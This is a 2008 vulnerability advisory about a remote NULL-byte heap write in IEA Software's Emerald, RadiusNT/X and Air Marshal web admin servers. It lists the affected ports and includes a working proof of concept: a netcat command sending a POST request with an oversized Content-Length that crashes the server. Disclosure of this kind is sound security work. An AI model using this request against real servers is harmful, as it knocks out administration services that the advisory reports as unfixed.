####################################################################### Luigi Auriemma Application: Configuration web server integrated in Emerald, RadiusNT/X and Air Marshal http://www.iea-software.com Versions: Emerald <= 5.0.49 RadiusNT and RadiusX <= 5.1.38 Radius test client <= 4.0.20 Air Marshal version <= 2.0.4 Platforms: Windows, FreeBSD, Linux and Solaris Bug: writing of a NULL byte in the memory Exploitation: remote Date: 08 Feb 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== All the products developed by IEA Software use some web servers for the remote administration of the services. The following are the programs which run this web interface and the ports on which they listen: - emerwebsrv, 80 and 443 - portald, 81 - schedule, 8010 - radadmn, 8011 - emerdap, 8012 - syslogd, 8013 - eaadmn, 8014 - emernet, 8018 - radlogin, 8020 - possibly others ####################################################################### ====== 2) Bug ====== For each HTTP POST request the configuration web server starts the receiving of the client's data using a heap buffer which automatically increases its size through realloc. When the data received is major than the integer value specified in Content-Length it stops the operation and places a NULL byte at the end of the data for delimiting it. The problem is that using a negative Content-Length value forces the server to place this 0x00 byte in a location of the memory which goes from heap_buffer+http_header+0x80000000 to heap_buffer+http_header+0xffffffff allowing an attacker to crash the server or placing this byte in a better location which could give him other possibilities of attack. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/emerdal.txt nc SERVER PORT -v -v < emerdal.txt Contents of emerdal.txt: POST / HTTP/1.0 Host: localhost Content-Length: 2147483647 ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org